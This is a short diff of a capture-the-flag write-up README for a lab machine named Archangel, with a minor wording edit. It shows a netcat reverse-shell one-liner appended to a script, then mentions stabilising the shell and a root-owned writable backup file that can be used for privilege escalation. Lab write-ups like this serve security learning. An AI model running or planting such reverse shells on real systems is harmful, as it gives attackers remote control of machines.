Sgt-Hartmann/Write-ups/Archangel/README.md

 ```
 echo "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc xx.xx.xx.xx 4445 >/tmp/f" >> helloworld.sh
 ```
-(Activate netcat in another terminal on port 4445)
-And obviously, we will stabilize the shell again and search for the flag of the user archangel.
+(Activate a netcat listener in another terminal on port 4445) We will stabilize the shell again and search for the flag of the user archangel.
 ![](https://github.com/user-attachments/assets/f8ad5060-bc0f-4ff5-9262-a05c0ac7ebfa)

 In the same folder of the flag, we can find a file named `backup` owned by root on which we have write permission. if we `strings` the file we can see that the file `cp` all the files of the `/home/user/archangel/myfiles/*` folder into `/opt/backupfiles`.